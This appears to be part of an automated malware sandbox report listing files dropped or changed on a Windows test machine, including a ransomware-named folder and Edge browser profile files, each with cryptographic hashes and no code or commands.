SHA512 447983a74a57074c21ea883c118c3849bae4c9b716c51ad81c3402b91b9eb0107f22f1f543fc06bd15caf733acc06bb50c50dae184ace52a670c5df543671c66

C:\Users\Admin\AppData\Local\Microsoft_Corporation\HEUR-Trojan-Ransom.MSIL.A_Url_hyzi2c1yzof5lmdswpn0aowbvgq0vrgi\10.0.17134.1\oscgelyv.newcfg

MD5 7da87c0a607285add8dddc26e8263d86
SHA1 93ae73e6915f4a1c11a40bbe23c09b72db3f502e
SHA256 f9ccb5c80fdbdce2490eb119b7885c3f19556d52cd8d2c0fe7a94801ac3a9799
SHA512 3db1d43d1a049c7b4338ee3aafe85ffd39e5401763bb271a5e8510716e53e10e743f821e79cd3d28564b39fa445edd1570c49b326da9eb3fa9ab8a0818ff7a0c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1c3de5b5-9fb8-4ace-8238-8737436952b9.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a7bfa10861b5fbef1be1e59cad9b91ca
SHA1 4142b49d8fc1461d0391f72105bc7c6acd1869b2
SHA256 f0683202ff79b787fa3a6db145ddb43ffd01fab29459fc4b45bb5aa16948a54b
SHA512 b362eb9655c5e5db8fa122099bddfe154b6ec18703ea1c84eca7907d122486d017d8ea9da6fb1a42bdd78e14010c7df3a9f146eda007b4e4e54076ccbe41d614

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 13773b926d31ee322aea3d70e8da2f00
SHA1 39bd89e00a3eb49156e27574981432a211685888
SHA256 d823faa1e52aeb54269ce74e9c8fb4d01bbb1f396aa221ab1ebe60855063a78a
SHA512 208ed5f560df157f5410cd7c0c2a12dadb75d38ae55e1b94d25841c37ad1ced029499ea01b4dda26df594a8eeba2f9f503d5d87a9e76d6a38698ede06aa9d6c7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f4846edccc1d68095592bca0ffb99040
SHA1 a06107192b4d9dafa935bc5a9e6f8745cff9cea8
SHA256 e6d91ad14d711d73c4629dd1ec0bb3cef5d16c9103dfecfd2bef19322a0f6bb0
SHA512 3b2a79069cde09693227a42409ad0e7a99358c40b5c1784bafe8e2f5796fb134b71b037f738ec5fa09912da667f461ded06fac9597c092c8cb025d3e896fcdb3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 119727993a182c3423939a6e347e97bc
SHA1 901a4aad42edc0056e2d9ed8cb4b9b11be07c533
SHA256 554524200eaa29e9d22b2f6b32c2ceb09200708c9af593ff75255210f0bb5b8b
SHA512 c3ade93ee824f655f45c0313f34f20b49f33bac9af875e1fe7a17f73244444a055860179989747eaae55d3385cfdf24366f51ac1ed8709530ffe158f56ec7166

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 589c49f8a8e18ec6998a7a30b4958ebc
SHA1 cd4e0e2a5cb1fd5099ff88daf4f48bdba566332e
SHA256 26d067dbb5e448b16f93a1bb22a2541beb7134b1b3e39903346d10b96022b6b8
SHA512 e73566a037838d1f7db7e9b728eba07db08e079de471baca7c8f863c7af7beb36221e9ff77e0a898ce86d4ef4c36f83fb3af9c35e342061b7a5442ca3b9024d2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

MD5 b0fac50b0bb863bd28214084ff688f2d
SHA1 0d1bdc117e81e3638c08bbd4b1335638aeac4910
SHA256 e30047aa3ccdbe3b619c73d8fd89f9fe4f500f4dec2ce2d8be1a6c49379d1932
SHA512 698fc0c8e8410aa6d3a98c6292c41b47d3a1f6330527379a3473c209b4543bc32b29910687a46724641e082348a8b7f29085da6614abf437a793bbd4e77bf5cd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

MD5 aee7c1c215db6ebb5d26dfcdba83988a
SHA1 d921a193c65fc7ef24559272fafd475f64744413
SHA256 88155969f085dc65c80460ffb1f504cd0d420436a466e5f24bfa02416f6428b9
SHA512 7e9b5040ba7745eedd3583e43a271845d2dad668d66929136d36b8a6ccd9926464a25342a27a0a26e1a333874c58130c22a65a3a5c87359d7955d9aa0074c0db